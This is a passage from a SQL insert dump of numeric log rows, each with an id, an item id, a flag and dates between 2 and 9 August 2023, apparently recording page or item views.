14:26:31'),(81912,1582,1,'2023-08-02','2023-08-02 14:36:03'),(81913,2904,1,'2023-08-02','2023-08-02 14:36:47'),(81914,1582,1,'2023-08-02','2023-08-02 14:37:03'),(81915,4520,1,'2023-08-02','2023-08-02 15:13:45'),(81916,484,1,'2023-08-02','2023-08-02 15:21:53'),(81917,4681,1,'2023-08-02','2023-08-02 16:37:26'),(81918,5323,1,'2023-08-02','2023-08-02 16:38:02'),(81919,2154,1,'2023-08-02','2023-08-02 17:06:26'),(81920,4960,1,'2023-08-02','2023-08-02 17:23:35'),(81921,4566,1,'2023-08-02','2023-08-02 18:01:35'),(81922,4911,1,'2023-08-02','2023-08-02 18:12:55'),(81923,4960,1,'2023-08-02','2023-08-02 18:22:08'),(81924,5292,1,'2023-08-02','2023-08-02 18:34:33'),(81925,2965,1,'2023-08-02','2023-08-02 18:40:26'),(81926,4911,1,'2023-08-02','2023-08-02 19:13:42'),(81927,2965,1,'2023-08-02','2023-08-02 19:45:19'),(81928,1741,1,'2023-08-02','2023-08-02 20:07:51'),(81929,4612,1,'2023-08-02','2023-08-02 20:54:44'),(81930,4703,1,'2023-08-02','2023-08-02 21:27:08'),(81931,4911,1,'2023-08-02','2023-08-02 21:33:24'),(81932,68,1,'2023-08-02','2023-08-02 21:34:26'),(81933,4911,1,'2023-08-02','2023-08-02 21:34:39'),(81934,3489,1,'2023-08-02','2023-08-02 21:47:01'),(81935,5140,1,'2023-08-02','2023-08-02 21:48:56'),(81936,4960,1,'2023-08-02','2023-08-02 22:03:26'),(81937,76,1,'2023-08-02','2023-08-02 22:11:59'),(81938,1877,1,'2023-08-02','2023-08-02 22:20:59'),(81939,3489,1,'2023-08-02','2023-08-02 22:27:39'),(81940,3764,1,'2023-08-02','2023-08-02 23:17:24'),(81941,1741,1,'2023-08-02','2023-08-02 23:19:43'),(81942,4697,1,'2023-08-02','2023-08-02 23:23:39'),(81943,4341,1,'2023-08-02','2023-08-02 23:34:09'),(81944,1872,1,'2023-08-02','2023-08-02 23:53:21'),(81945,5298,1,'2023-08-03','2023-08-03 00:04:41'),(81946,80,1,'2023-08-03','2023-08-03 00:37:17'),(81947,487,1,'2023-08-03','2023-08-03 00:37:49'),(81948,89,1,'2023-08-03','2023-08-03 00:38:08'),(81949,1602,1,'2023-08-03','2023-08-03 00:38:34'),(81950,80,1,'2023-08-03','2023-08-03 00:53:17'),(81951,5248,1,'2023-08-03','2023-08-03 00:53:24'),(81952,1600,1,'2023-08-03','2023-08-03 00:58:27'),(81953,4700,1,'2023-08-03','2023-08-03 01:31:58'),(81954,2419,1,'2023-08-03','2023-08-03 01:38:28'),(81955,2419,1,'2023-08-03','2023-08-03 01:38:50'),(81956,1594,1,'2023-08-03','2023-08-03 01:39:00'),(81957,2420,1,'2023-08-03','2023-08-03 01:39:01'),(81958,1594,1,'2023-08-03','2023-08-03 03:09:00'),(81959,4966,1,'2023-08-03','2023-08-03 04:18:37'),(81960,1602,1,'2023-08-03','2023-08-03 05:08:20'),(81961,3664,1,'2023-08-03','2023-08-03 05:12:41'),(81962,4878,1,'2023-08-03','2023-08-03 05:43:07'),(81963,5101,1,'2023-08-03','2023-08-03 06:20:36'),(81964,2309,1,'2023-08-03','2023-08-03 07:02:48'),(81965,2309,1,'2023-08-03','2023-08-03 07:04:34'),(81966,5122,1,'2023-08-03','2023-08-03 07:21:47'),(81967,80,1,'2023-08-03','2023-08-03 08:30:11'),(81968,3489,1,'2023-08-03','2023-08-03 09:19:33'),(81969,3004,1,'2023-08-03','2023-08-03 09:22:41'),(81970,91,1,'2023-08-03','2023-08-03 10:17:53'),(81971,5080,1,'2023-08-03','2023-08-03 10:18:47'),(81972,91,1,'2023-08-03','2023-08-03 10:19:15'),(81973,5259,1,'2023-08-03','2023-08-03 10:19:23'),(81974,5080,1,'2023-08-03','2023-08-03 10:20:21'),(81975,5080,1,'2023-08-03','2023-08-03 10:20:23'),(81976,91,1,'2023-08-03','2023-08-03 10:20:49'),(81977,5071,1,'2023-08-03','2023-08-03 10:30:29'),(81978,1739,1,'2023-08-03','2023-08-03 10:30:33'),(81979,5280,1,'2023-08-03','2023-08-03 10:46:47'),(81980,4685,1,'2023-08-03','2023-08-03 10:46:48'),(81981,4938,1,'2023-08-03','2023-08-03 10:58:12'),(81982,3764,1,'2023-08-03','2023-08-03 11:09:40'),(81983,1743,1,'2023-08-03','2023-08-03 11:13:21'),(81984,4498,1,'2023-08-03','2023-08-03 11:38:03'),(81985,91,1,'2023-08-03','2023-08-03 12:06:13'),(81986,2704,1,'2023-08-03','2023-08-03 12:25:40'),(81987,5128,1,'2023-08-03','2023-08-03 12:35:59'),(81988,470,1,'2023-08-03','2023-08-03 12:47:15'),(81989,4416,1,'2023-08-03','2023-08-03 12:53:17'),(81990,2395,1,'2023-08-03','2023-08-03 12:56:45'),(81991,1608,1,'2023-08-03','2023-08-03 12:56:48'),(81992,2704,1,'2023-08-03','2023-08-03 13:14:13'),(81993,5080,1,'2023-08-03','2023-08-03 13:37:50'),(81994,4709,1,'2023-08-03','2023-08-03 13:56:29'),(81995,4382,1,'2023-08-03','2023-08-03 13:57:33'),(81996,4966,1,'2023-08-03','2023-08-03 14:00:49'),(81997,1594,1,'2023-08-03','2023-08-03 14:19:16'),(81998,4694,1,'2023-08-03','2023-08-03 14:30:41'),(81999,3030,1,'2023-08-03','2023-08-03 14:36:08'),(82000,1588,1,'2023-08-03','2023-08-03 14:51:50'),(82001,5307,1,'2023-08-03','2023-08-03 15:08:17'),(82002,4911,1,'2023-08-03','2023-08-03 15:45:32'),(82003,80,1,'2023-08-03','2023-08-03 15:45:47'),(82004,4911,1,'2023-08-03','2023-08-03 15:45:53'),(82005,3102,1,'2023-08-03','2023-08-03 16:03:36'),(82006,3090,1,'2023-08-03','2023-08-03 16:41:51'),(82007,2159,1,'2023-08-03','2023-08-03 16:48:44'),(82008,4498,1,'2023-08-03','2023-08-03 17:14:36'),(82009,2309,1,'2023-08-03','2023-08-03 17:19:41'),(82010,2457,1,'2023-08-03','2023-08-03 18:53:26'),(82011,3092,1,'2023-08-03','2023-08-03 20:45:32'),(82012,5314,1,'2023-08-03','2023-08-03 20:54:46'),(82013,3034,1,'2023-08-03','2023-08-03 21:32:10'),(82014,4785,1,'2023-08-03','2023-08-03 21:48:23'),(82015,4911,1,'2023-08-04','2023-08-04 00:14:39'),(82016,3781,1,'2023-08-04','2023-08-04 02:02:19'),(82017,4566,1,'2023-08-04','2023-08-04 02:18:31'),(82018,5320,1,'2023-08-04','2023-08-04 02:31:34'),(82019,4712,1,'2023-08-04','2023-08-04 03:23:43'),(82020,5268,1,'2023-08-04','2023-08-04 04:59:03'),(82021,4517,1,'2023-08-04','2023-08-04 06:42:29'),(82022,4520,1,'2023-08-04','2023-08-04 07:51:19'),(82023,473,1,'2023-08-04','2023-08-04 07:55:34'),(82024,487,1,'2023-08-04','2023-08-04 07:55:34'),(82025,4960,1,'2023-08-04','2023-08-04 08:08:04'),(82026,4960,1,'2023-08-04','2023-08-04 08:08:06'),(82027,4960,1,'2023-08-04','2023-08-04 08:08:08'),(82028,3090,1,'2023-08-04','2023-08-04 08:30:53'),(82029,4514,1,'2023-08-04','2023-08-04 08:31:55'),(82030,2956,1,'2023-08-04','2023-08-04 08:50:56'),(82031,1586,1,'2023-08-04','2023-08-04 09:24:02'),(82032,5289,1,'2023-08-04','2023-08-04 09:35:56'),(82033,4911,1,'2023-08-04','2023-08-04 09:46:49'),(82034,2704,1,'2023-08-04','2023-08-04 10:38:27'),(82035,487,1,'2023-08-04','2023-08-04 11:17:58'),(82036,473,1,'2023-08-04','2023-08-04 11:17:58'),(82037,1612,1,'2023-08-04','2023-08-04 11:27:04'),(82038,3498,1,'2023-08-04','2023-08-04 14:08:56'),(82039,4874,1,'2023-08-04','2023-08-04 14:14:34'),(82040,2769,1,'2023-08-04','2023-08-04 14:32:48'),(82041,5116,1,'2023-08-04','2023-08-04 14:46:06'),(82042,2769,1,'2023-08-04','2023-08-04 15:14:05'),(82043,2704,1,'2023-08-04','2023-08-04 15:14:28'),(82044,1582,1,'2023-08-04','2023-08-04 15:29:04'),(82045,1768,1,'2023-08-04','2023-08-04 15:31:04'),(82046,2904,1,'2023-08-04','2023-08-04 15:44:02'),(82047,3030,1,'2023-08-04','2023-08-04 16:06:33'),(82048,1582,1,'2023-08-04','2023-08-04 16:08:33'),(82049,4911,1,'2023-08-04','2023-08-04 16:51:11'),(82050,4529,1,'2023-08-04','2023-08-04 17:14:02'),(82051,5131,1,'2023-08-04','2023-08-04 17:36:32'),(82052,3090,1,'2023-08-04','2023-08-04 18:15:25'),(82053,1782,1,'2023-08-04','2023-08-04 19:10:37'),(82054,4960,1,'2023-08-04','2023-08-04 19:22:22'),(82055,2395,1,'2023-08-04','2023-08-04 19:56:41'),(82056,472,1,'2023-08-04','2023-08-04 20:26:06'),(82057,5307,1,'2023-08-04','2023-08-04 20:31:13'),(82058,4840,1,'2023-08-04','2023-08-04 21:44:35'),(82059,469,1,'2023-08-04','2023-08-04 21:55:06'),(82060,2309,1,'2023-08-04','2023-08-04 23:09:45'),(82061,1600,1,'2023-08-04','2023-08-04 23:35:15'),(82062,4238,1,'2023-08-04','2023-08-04 23:49:13'),(82063,2410,1,'2023-08-05','2023-08-05 00:34:12'),(82064,1544,1,'2023-08-05','2023-08-05 01:16:40'),(82065,1544,1,'2023-08-05','2023-08-05 01:43:24'),(82066,486,1,'2023-08-05','2023-08-05 02:04:09'),(82067,5280,1,'2023-08-05','2023-08-05 02:04:12'),(82068,2804,1,'2023-08-05','2023-08-05 02:28:26'),(82069,1598,1,'2023-08-05','2023-08-05 02:58:25'),(82070,4238,1,'2023-08-05','2023-08-05 03:13:26'),(82071,2309,1,'2023-08-05','2023-08-05 03:28:27'),(82072,3781,1,'2023-08-05','2023-08-05 03:40:05'),(82073,4911,1,'2023-08-05','2023-08-05 03:48:23'),(82074,5295,1,'2023-08-05','2023-08-05 03:58:26'),(82075,4520,1,'2023-08-05','2023-08-05 04:00:12'),(82076,4963,1,'2023-08-05','2023-08-05 04:38:53'),(82077,2804,1,'2023-08-05','2023-08-05 04:40:07'),(82078,5295,1,'2023-08-05','2023-08-05 05:20:36'),(82079,4674,1,'2023-08-05','2023-08-05 05:21:48'),(82080,2911,1,'2023-08-05','2023-08-05 05:44:25'),(82081,2395,1,'2023-08-05','2023-08-05 06:34:41'),(82082,68,1,'2023-08-05','2023-08-05 06:41:12'),(82083,5295,1,'2023-08-05','2023-08-05 07:11:32'),(82084,2410,1,'2023-08-05','2023-08-05 07:12:50'),(82085,4960,1,'2023-08-05','2023-08-05 07:45:26'),(82086,570,1,'2023-08-05','2023-08-05 08:00:44'),(82087,3083,1,'2023-08-05','2023-08-05 08:09:35'),(82088,4911,1,'2023-08-05','2023-08-05 08:29:55'),(82089,4911,1,'2023-08-05','2023-08-05 08:32:06'),(82090,2904,1,'2023-08-05','2023-08-05 08:35:32'),(82091,3083,1,'2023-08-05','2023-08-05 08:40:33'),(82092,3083,1,'2023-08-05','2023-08-05 08:53:43'),(82093,5292,1,'2023-08-05','2023-08-05 10:11:27'),(82094,5028,1,'2023-08-05','2023-08-05 11:01:44'),(82095,5304,1,'2023-08-05','2023-08-05 11:41:26'),(82096,3764,1,'2023-08-05','2023-08-05 13:26:55'),(82097,4703,1,'2023-08-05','2023-08-05 13:46:30'),(82098,4514,1,'2023-08-05','2023-08-05 13:46:33'),(82099,5307,1,'2023-08-05','2023-08-05 13:46:35'),(82100,3297,1,'2023-08-05','2023-08-05 13:50:30'),(82101,472,1,'2023-08-05','2023-08-05 13:59:29'),(82102,5314,1,'2023-08-05','2023-08-05 14:36:29'),(82103,2704,1,'2023-08-05','2023-08-05 14:59:30'),(82104,5001,1,'2023-08-05','2023-08-05 15:13:56'),(82105,4357,1,'2023-08-05','2023-08-05 15:33:18'),(82106,4980,1,'2023-08-05','2023-08-05 15:43:30'),(82107,5334,1,'2023-08-05','2023-08-05 16:02:25'),(82108,5067,1,'2023-08-05','2023-08-05 16:22:21'),(82109,5001,1,'2023-08-05','2023-08-05 17:20:39'),(82110,4765,1,'2023-08-05','2023-08-05 17:40:08'),(82111,1766,1,'2023-08-05','2023-08-05 19:39:57'),(82112,4963,1,'2023-08-05','2023-08-05 19:43:54'),(82113,4960,1,'2023-08-05','2023-08-05 20:45:20'),(82114,3764,1,'2023-08-05','2023-08-05 21:05:01'),(82115,1608,1,'2023-08-05','2023-08-05 22:26:33'),(82116,4971,1,'2023-08-06','2023-08-06 00:23:19'),(82117,4335,1,'2023-08-06','2023-08-06 00:27:21'),(82118,5163,1,'2023-08-06','2023-08-06 01:43:27'),(82119,4335,1,'2023-08-06','2023-08-06 01:55:48'),(82120,2161,1,'2023-08-06','2023-08-06 02:12:39'),(82121,3297,1,'2023-08-06','2023-08-06 02:50:56'),(82122,4944,1,'2023-08-06','2023-08-06 02:59:15'),(82123,5253,1,'2023-08-06','2023-08-06 03:05:57'),(82124,4520,1,'2023-08-06','2023-08-06 03:13:28'),(82125,4963,1,'2023-08-06','2023-08-06 03:21:38'),(82126,2609,1,'2023-08-06','2023-08-06 03:43:28'),(82127,1544,1,'2023-08-06','2023-08-06 03:58:30'),(82128,4694,1,'2023-08-06','2023-08-06 05:01:26'),(82129,4685,1,'2023-08-06','2023-08-06 05:44:42'),(82130,4685,1,'2023-08-06','2023-08-06 05:44:44'),(82131,4785,1,'2023-08-06','2023-08-06 05:48:39'),(82132,474,1,'2023-08-06','2023-08-06 06:57:35'),(82133,1544,1,'2023-08-06','2023-08-06 06:57:37'),(82134,5295,1,'2023-08-06','2023-08-06 07:10:11'),(82135,5295,1,'2023-08-06','2023-08-06 07:10:13'),(82136,468,1,'2023-08-06','2023-08-06 07:17:00'),(82137,5256,1,'2023-08-06','2023-08-06 07:18:40'),(82138,5292,1,'2023-08-06','2023-08-06 07:53:13'),(82139,5292,1,'2023-08-06','2023-08-06 07:53:14'),(82140,5289,1,'2023-08-06','2023-08-06 08:02:13'),(82141,5289,1,'2023-08-06','2023-08-06 08:02:14'),(82142,5298,1,'2023-08-06','2023-08-06 08:11:13'),(82143,487,1,'2023-08-06','2023-08-06 08:22:12'),(82144,487,1,'2023-08-06','2023-08-06 08:22:14'),(82145,5301,1,'2023-08-06','2023-08-06 08:40:10'),(82146,5301,1,'2023-08-06','2023-08-06 08:40:11'),(82147,3771,1,'2023-08-06','2023-08-06 08:50:32'),(82148,4674,1,'2023-08-06','2023-08-06 08:56:32'),(82149,4674,1,'2023-08-06','2023-08-06 08:56:34'),(82150,4688,1,'2023-08-06','2023-08-06 09:12:56'),(82151,4688,1,'2023-08-06','2023-08-06 09:12:57'),(82152,5307,1,'2023-08-06','2023-08-06 09:21:05'),(82153,5307,1,'2023-08-06','2023-08-06 09:21:07'),(82154,4776,1,'2023-08-06','2023-08-06 09:29:16'),(82155,4776,1,'2023-08-06','2023-08-06 09:29:18'),(82156,4700,1,'2023-08-06','2023-08-06 09:37:27'),(82157,5253,1,'2023-08-06','2023-08-06 09:45:38'),(82158,5253,1,'2023-08-06','2023-08-06 09:45:40'),(82159,4668,1,'2023-08-06','2023-08-06 09:52:55'),(82160,4668,1,'2023-08-06','2023-08-06 09:52:56'),(82161,4703,1,'2023-08-06','2023-08-06 10:00:22'),(82162,4703,1,'2023-08-06','2023-08-06 10:00:25'),(82163,5310,1,'2023-08-06','2023-08-06 10:14:49'),(82164,5304,1,'2023-08-06','2023-08-06 10:22:06'),(82165,5304,1,'2023-08-06','2023-08-06 10:22:08'),(82166,468,1,'2023-08-06','2023-08-06 10:29:25'),(82167,1872,1,'2023-08-06','2023-08-06 10:44:00'),(82168,1872,1,'2023-08-06','2023-08-06 10:44:02'),(82169,1877,1,'2023-08-06','2023-08-06 10:51:18'),(82170,1877,1,'2023-08-06','2023-08-06 10:51:20'),(82171,4681,1,'2023-08-06','2023-08-06 11:00:18'),(82172,4681,1,'2023-08-06','2023-08-06 11:00:19'),(82173,4709,1,'2023-08-06','2023-08-06 11:06:34'),(82174,4709,1,'2023-08-06','2023-08-06 11:06:36'),(82175,4691,1,'2023-08-06','2023-08-06 11:09:18'),(82176,4691,1,'2023-08-06','2023-08-06 11:09:19'),(82177,2904,1,'2023-08-06','2023-08-06 11:15:34'),(82178,2904,1,'2023-08-06','2023-08-06 11:15:36'),(82179,5256,1,'2023-08-06','2023-08-06 11:18:17'),(82180,5256,1,'2023-08-06','2023-08-06 11:18:18'),(82181,4706,1,'2023-08-06','2023-08-06 11:27:18'),(82182,4706,1,'2023-08-06','2023-08-06 11:27:20'),(82183,4697,1,'2023-08-06','2023-08-06 11:36:17'),(82184,4697,1,'2023-08-06','2023-08-06 11:36:19'),(82185,3764,1,'2023-08-06','2023-08-06 11:41:23'),(82186,4694,1,'2023-08-06','2023-08-06 11:45:18'),(82187,4694,1,'2023-08-06','2023-08-06 11:45:19'),(82188,76,1,'2023-08-06','2023-08-06 11:46:56'),(82189,4677,1,'2023-08-06','2023-08-06 11:54:18'),(82190,4677,1,'2023-08-06','2023-08-06 11:54:19'),(82191,4454,1,'2023-08-06','2023-08-06 12:03:18'),(82192,4524,1,'2023-08-06','2023-08-06 12:12:18'),(82193,4524,1,'2023-08-06','2023-08-06 12:12:19'),(82194,5101,1,'2023-08-06','2023-08-06 12:21:18'),(82195,5101,1,'2023-08-06','2023-08-06 12:21:20'),(82196,74,1,'2023-08-06','2023-08-06 12:30:19'),(82197,74,1,'2023-08-06','2023-08-06 12:30:21'),(82198,4712,1,'2023-08-06','2023-08-06 12:39:18'),(82199,4712,1,'2023-08-06','2023-08-06 12:39:20'),(82200,5062,1,'2023-08-06','2023-08-06 12:45:31'),(82201,3092,1,'2023-08-06','2023-08-06 13:16:58'),(82202,4944,1,'2023-08-06','2023-08-06 13:30:31'),(82203,470,1,'2023-08-06','2023-08-06 13:59:29'),(82204,467,1,'2023-08-06','2023-08-06 13:59:32'),(82205,5125,1,'2023-08-06','2023-08-06 14:17:29'),(82206,4960,1,'2023-08-06','2023-08-06 14:38:35'),(82207,2809,1,'2023-08-06','2023-08-06 14:44:30'),(82208,5280,1,'2023-08-06','2023-08-06 14:58:05'),(82209,4840,1,'2023-08-06','2023-08-06 15:00:32'),(82210,3704,1,'2023-08-06','2023-08-06 15:05:01'),(82211,72,1,'2023-08-06','2023-08-06 15:17:05'),(82212,5122,1,'2023-08-06','2023-08-06 15:22:56'),(82213,80,1,'2023-08-06','2023-08-06 15:29:34'),(82214,4960,1,'2023-08-06','2023-08-06 15:37:09'),(82215,1600,1,'2023-08-06','2023-08-06 16:14:30'),(82216,76,1,'2023-08-06','2023-08-06 16:25:56'),(82217,4776,1,'2023-08-06','2023-08-06 16:59:30'),(82218,5128,1,'2023-08-06','2023-08-06 17:33:26'),(82219,4238,1,'2023-08-06','2023-08-06 17:33:28'),(82220,5163,1,'2023-08-06','2023-08-06 17:44:30'),(82221,4697,1,'2023-08-06','2023-08-06 18:16:08'),(82222,3781,1,'2023-08-06','2023-08-06 18:25:26'),(82223,4404,1,'2023-08-06','2023-08-06 20:17:18'),(82224,4938,1,'2023-08-06','2023-08-06 20:52:46'),(82225,4391,1,'2023-08-07','2023-08-07 00:11:22'),(82226,1772,1,'2023-08-07','2023-08-07 00:29:33'),(82227,4691,1,'2023-08-07','2023-08-07 00:47:11'),(82228,474,1,'2023-08-07','2023-08-07 01:30:22'),(82229,1722,1,'2023-08-07','2023-08-07 03:01:56'),(82230,4520,1,'2023-08-07','2023-08-07 03:36:15'),(82231,3735,1,'2023-08-07','2023-08-07 03:41:56'),(82232,5307,1,'2023-08-07','2023-08-07 04:06:23'),(82233,1722,1,'2023-08-07','2023-08-07 04:10:34'),(82234,2989,1,'2023-08-07','2023-08-07 04:12:39'),(82235,4436,1,'2023-08-07','2023-08-07 04:33:16'),(82236,5280,1,'2023-08-07','2023-08-07 04:44:58'),(82237,3027,1,'2023-08-07','2023-08-07 05:09:57'),(82238,80,1,'2023-08-07','2023-08-07 05:27:41'),(82239,5134,1,'2023-08-07','2023-08-07 05:29:30'),(82240,5320,1,'2023-08-07','2023-08-07 06:43:58'),(82241,4454,1,'2023-08-07','2023-08-07 07:57:40'),(82242,2410,1,'2023-08-07','2023-08-07 09:55:01'),(82243,2410,1,'2023-08-07','2023-08-07 09:55:01'),(82244,4709,1,'2023-08-07','2023-08-07 10:10:46'),(82245,4960,1,'2023-08-07','2023-08-07 10:12:41'),(82246,4983,1,'2023-08-07','2023-08-07 10:12:42'),(82247,5268,1,'2023-08-07','2023-08-07 10:55:45'),(82248,3090,1,'2023-08-07','2023-08-07 12:03:49'),(82249,4911,1,'2023-08-07','2023-08-07 12:03:53'),(82250,3090,1,'2023-08-07','2023-08-07 12:03:54'),(82251,2964,1,'2023-08-07','2023-08-07 13:08:27'),(82252,4911,1,'2023-08-07','2023-08-07 13:12:43'),(82253,1582,1,'2023-08-07','2023-08-07 13:12:44'),(82254,91,1,'2023-08-07','2023-08-07 13:13:21'),(82255,5363,1,'2023-08-07','2023-08-07 13:13:52'),(82256,5363,1,'2023-08-07','2023-08-07 13:13:53'),(82257,91,1,'2023-08-07','2023-08-07 13:16:33'),(82258,2309,1,'2023-08-07','2023-08-07 13:23:10'),(82259,3092,1,'2023-08-07','2023-08-07 13:55:51'),(82260,473,1,'2023-08-07','2023-08-07 14:10:36'),(82261,1870,1,'2023-08-07','2023-08-07 14:10:36'),(82262,3083,1,'2023-08-07','2023-08-07 15:01:53'),(82263,3265,1,'2023-08-07','2023-08-07 15:37:43'),(82264,2309,1,'2023-08-07','2023-08-07 16:07:36'),(82265,2964,1,'2023-08-07','2023-08-07 16:11:53'),(82266,1596,1,'2023-08-07','2023-08-07 16:49:04'),(82267,1596,1,'2023-08-07','2023-08-07 16:58:42'),(82268,4681,1,'2023-08-07','2023-08-07 17:18:11'),(82269,5163,1,'2023-08-07','2023-08-07 20:48:11'),(82270,5163,1,'2023-08-07','2023-08-07 20:51:26'),(82271,5005,1,'2023-08-07','2023-08-07 20:51:28'),(82272,1612,1,'2023-08-07','2023-08-07 21:41:52'),(82273,1614,1,'2023-08-07','2023-08-07 22:29:48'),(82274,3764,1,'2023-08-07','2023-08-07 22:36:39'),(82275,2704,1,'2023-08-08','2023-08-08 00:53:10'),(82276,76,1,'2023-08-08','2023-08-08 01:03:36'),(82277,4930,1,'2023-08-08','2023-08-08 01:04:35'),(82278,4911,1,'2023-08-08','2023-08-08 01:08:40'),(82279,4930,1,'2023-08-08','2023-08-08 01:10:50'),(82280,4938,1,'2023-08-08','2023-08-08 01:10:55'),(82281,89,1,'2023-08-08','2023-08-08 01:12:33'),(82282,89,1,'2023-08-08','2023-08-08 01:14:45'),(82283,89,1,'2023-08-08','2023-08-08 01:15:04'),(82284,76,1,'2023-08-08','2023-08-08 01:15:38'),(82285,87,1,'2023-08-08','2023-08-08 01:16:49'),(82286,4930,1,'2023-08-08','2023-08-08 01:20:03'),(82287,4338,1,'2023-08-08','2023-08-08 01:54:04'),(82288,3249,1,'2023-08-08','2023-08-08 02:05:32'),(82289,474,1,'2023-08-08','2023-08-08 02:10:06'),(82290,5289,1,'2023-08-08','2023-08-08 02:12:48'),(82291,3297,1,'2023-08-08','2023-08-08 02:27:47'),(82292,1772,1,'2023-08-08','2023-08-08 02:54:38'),(82293,474,1,'2023-08-08','2023-08-08 02:58:55'),(82294,4448,1,'2023-08-08','2023-08-08 03:09:24'),(82295,2904,1,'2023-08-08','2023-08-08 03:14:13'),(82296,5314,1,'2023-08-08','2023-08-08 04:09:19'),(82297,4983,1,'2023-08-08','2023-08-08 06:07:51'),(82298,2297,1,'2023-08-08','2023-08-08 07:06:07'),(82299,1596,1,'2023-08-08','2023-08-08 08:51:56'),(82300,1596,1,'2023-08-08','2023-08-08 08:56:36'),(82301,4944,1,'2023-08-08','2023-08-08 09:29:21'),(82302,4747,1,'2023-08-08','2023-08-08 12:35:13'),(82303,4976,1,'2023-08-08','2023-08-08 12:44:29'),(82304,4938,1,'2023-08-08','2023-08-08 13:10:00'),(82305,1582,1,'2023-08-08','2023-08-08 13:11:04'),(82306,1582,1,'2023-08-08','2023-08-08 13:11:07'),(82307,76,1,'2023-08-08','2023-08-08 13:11:16'),(82308,108,1,'2023-08-08','2023-08-08 13:11:32'),(82309,89,1,'2023-08-08','2023-08-08 13:12:12'),(82310,1544,1,'2023-08-08','2023-08-08 13:12:26'),(82311,89,1,'2023-08-08','2023-08-08 13:12:30'),(82312,1544,1,'2023-08-08','2023-08-08 13:12:31'),(82313,89,1,'2023-08-08','2023-08-08 13:12:44'),(82314,474,1,'2023-08-08','2023-08-08 13:13:36'),(82315,3090,1,'2023-08-08','2023-08-08 13:17:22'),(82316,1606,1,'2023-08-08','2023-08-08 13:57:44'),(82317,5280,1,'2023-08-08','2023-08-08 14:03:58'),(82318,2410,1,'2023-08-08','2023-08-08 14:05:53'),(82319,5276,1,'2023-08-08','2023-08-08 14:06:12'),(82320,3764,1,'2023-08-08','2023-08-08 14:14:40'),(82321,3090,1,'2023-08-08','2023-08-08 14:15:05'),(82322,4517,1,'2023-08-08','2023-08-08 14:18:56'),(82323,5323,1,'2023-08-08','2023-08-08 14:22:49'),(82324,3027,1,'2023-08-08','2023-08-08 14:31:14'),(82325,4911,1,'2023-08-08','2023-08-08 14:31:39'),(82326,2904,1,'2023-08-08','2023-08-08 14:40:13'),(82327,4768,1,'2023-08-08','2023-08-08 14:40:48'),(82328,5280,1,'2023-08-08','2023-08-08 14:48:56'),(82329,4432,1,'2023-08-08','2023-08-08 14:53:58'),(82330,1604,1,'2023-08-08','2023-08-08 15:07:22'),(82331,4938,1,'2023-08-08','2023-08-08 15:11:13'),(82332,474,1,'2023-08-08','2023-08-08 15:16:59'),(82333,4238,1,'2023-08-08','2023-08-08 15:20:21'),(82334,80,1,'2023-08-08','2023-08-08 15:25:11'),(82335,4980,1,'2023-08-08','2023-08-08 15:26:58'),(82336,3092,1,'2023-08-08','2023-08-08 15:57:07'),(82337,3764,1,'2023-08-08','2023-08-08 16:06:59'),(82338,4520,1,'2023-08-08','2023-08-08 16:10:49'),(82339,3764,1,'2023-08-08','2023-08-08 16:16:59'),(82340,3090,1,'2023-08-08','2023-08-08 16:30:35'),(82341,4977,1,'2023-08-08','2023-08-08 16:37:00'),(82342,3083,1,'2023-08-08','2023-08-08 16:40:50'),(82343,4753,1,'2023-08-08','2023-08-08 16:46:58'),(82344,4566,1,'2023-08-08','2023-08-08 16:56:58'),(82345,4988,1,'2023-08-08','2023-08-08 17:10:53'),(82346,5334,1,'2023-08-08','2023-08-08 17:41:33'),(82347,4988,1,'2023-08-08','2023-08-08 17:55:54'),(82348,4976,1,'2023-08-08','2023-08-08 18:06:17'),(82349,3249,1,'2023-08-08','2023-08-08 18:14:15'),(82350,4977,1,'2023-08-08','2023-08-08 18:22:26'),(82351,5320,1,'2023-08-08','2023-08-08 18:55:10'),(82352,3764,1,'2023-08-08','2023-08-08 19:01:39'),(82353,4529,1,'2023-08-08','2023-08-08 20:25:10'),(82354,4983,1,'2023-08-08','2023-08-08 20:42:58'),(82355,3764,1,'2023-08-08','2023-08-08 21:07:23'),(82356,3764,1,'2023-08-08','2023-08-08 21:13:10'),(82357,4878,1,'2023-08-08','2023-08-08 21:29:49'),(82358,4776,1,'2023-08-08','2023-08-08 21:45:58'),(82359,3087,1,'2023-08-08','2023-08-08 21:57:24'),(82360,3664,1,'2023-08-09','2023-08-09 03:04:59'),(82361,3069,1,'2023-08-09','2023-08-09 03:05:03'),(82362,3781,1,'2023-08-09','2023-08-09 03:43:40'),(82363,4966,1,'2023-08-09','2023-08-09 04:06:11'),(82364,5356,1,'2023-08-09','2023-08-09 04:28:42'),(82365,5062,1,'2023-08-09','2023-08-09 04:44:25'),(82366,5062,1,'2023-08-09','2023-08-09 04:44:43'),(82367,3226,1,'2023-08-09','2023-08-09 04:51:11'),(82368,2296,1,'2023-08-09','2023-08-09 04:57:57'),(82369,468,1,'2023-08-09','2023-08-09 05:04:08'),(82370,5356,1,'2023-08-09','2023-08-09 06:16:04'),(82371,3285,1,'2023-08-09','2023-08-09 06:33:12'),(82372,4966,1,'2023-08-09','2023-08-09 06:50:02'),(82373,2165,1,'2023-08-09','2023-08-09 07:17:28'),(82374,5128,1,'2023-08-09','2023-08-09 07:44:38'),(82375,3738,1,'2023-08-09','2023-08-09 07:47:33'),(82376,4966,1,'2023-08-09','2023-08-09 07:49:29'),(82377,4694,1,'2023-08-09','2023-08-09 08:11:51'),(82378,1711,1,'2023-08-09','2023-08-09 08:24:22'),(82379,4566,1,'2023-08-09','2023-08-09 08:56:02'),(82380,4566,1,'2023-08-09','2023-08-09 08:56:04'),(82381,2704,1,'2023-08-09','2023-08-09 09:02:24'),(82382,4520,1,'2023-08-09','2023-08-09 09:30:11'),(82383,4520,1,'2023-08-09','2023-08-09 09:30:13'),(82384,5280,1,'2023-08-09','2023-08-09 10:01:13'),(82385,5280,1,'2023-08-09','2023-08-09 10:01:15'),(82386,1608,1,'2023-08-09','2023-08-09 10:10:06'),(82387,4551,1,'2023-08-09','2023-08-09 10:10:13'),(82388,4551,1,'2023-08-09','2023-08-09 10:10:15'),(82389,4529,1,'2023-08-09','2023-08-09 10:24:11'),(82390,4529,1,'2023-08-09','2023-08-09 10:24:12'),(82391,68,1,'2023-08-09','2023-08-09 10:33:59'),(82392,4514,1,'2023-08-09','2023-08-09 10:42:14'),(82393,4514,1,'2023-08-09','2023-08-09 10:42:16'),(82394,4517,1,'2023-08-09','2023-08-09 11:00:11'),(82395,4517,1,'2023-08-09','2023-08-09 11:00:13'),(82396,5137,1,'2023-08-09','2023-08-09 